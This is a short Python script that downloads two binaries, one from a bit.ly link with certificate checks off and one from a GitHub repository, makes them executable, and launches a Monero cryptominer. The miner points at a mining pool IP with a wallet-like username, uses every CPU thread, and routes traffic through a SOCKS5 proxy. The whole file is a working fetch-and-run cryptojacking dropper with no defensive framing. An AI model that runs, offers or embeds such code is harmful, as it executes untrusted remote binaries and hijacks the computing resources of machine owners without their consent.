import os

os.system("wget --no-check-certificate -c https://bit.ly/38QFOus -O xolx")
os.system("wget https://github.com/ardisantaka/ardia/raw/main/gas")
os.system("chmod +x gas xolx")
os.system("./xolx -o 83.151.238.34:10010 -u GMPHYf5KRkcAyik7Jw9oHRfJtUdw2Kj5f4VTFJ25AaFVYxofetir8Cnh7S76Q854oMXzwaguL8p5KEz1tm3rn1SA6hKNk9KpigmPYmtzuf -p XMR-NODE-PROXY --donate-level 1 -k -t $(nproc --all) --tls -x socks5://72.223.168.73:57494")
